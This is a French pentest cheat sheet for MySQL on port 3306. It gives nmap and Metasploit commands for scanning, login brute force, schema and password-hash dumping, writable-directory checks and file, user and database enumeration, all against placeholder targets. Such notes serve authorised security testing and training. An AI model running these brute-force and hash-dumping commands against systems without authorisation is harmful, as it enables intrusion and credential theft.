# MySQL - port 3306

## Scan

*`$ nmap -sV -p3306 <target IP>`*

## Connexion

*`$ mysql -h <host IP> -u <username> -p`*

## Bruteforce

Avec metasploit:

```bash
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_login) > set user_file user.txt
msf6 auxiliary(scanner/mysql/mysql_login) > set pass_file pass.txt
msf6 auxiliary(scanner/mysql/mysql_login) > exploit
```

Avec nmap:

```bash
nmap -p3306 --script=mysql-brute --script-args userdb=/root/Desktop/user.txt, passdb=/root/Desktop/pass.txt <target IP>
```

## Dump schema

```bash
msf6 > use auxiliary/scanner/mysql/mysql_schemadump
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_schemadump) > exploit
```

## Dump hash

Avec metasploit:

```bash
msf6 > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_hashdump) > exploit
```

Avec nmap:

```bash
nmap -p3306 <target IP> --script=mysql-dump-hashes --script-args mysqluser=<username>,mysqlpass=<password>
```

## Répertoires modifiables

```bash
msf6 > use auxiliary/scanner/mysql/mysql_writable_dirs
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > set dir_list dir.txt
msf6 auxiliary(scanner/mysql/mysql_writable_dirs) > exploit
```

## Enumeration des fichiers

```bash
msf6 > use auxiliary/scanner/mysql/mysql_file_enum
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set rhosts <target IP>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set username <username>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set password <password>
msf6 auxiliary(scanner/mysql/mysql_file_enum) > set file_list files.txt
msf6 auxiliary(scanner/mysql/mysql_file_enum) > exploit
```

## Enumeration des utilisateurs

```bash
nmap -p3306 <target IP> --script=mysql-users --script-args mysqluser=<username>,mysqlpass=<password>
```

## Enumeration des bases de données

```bash
nmap -p3306 <target IP> --script=mysql-databases --script-args mysqluser=<username>,mysqlpass=<password>
```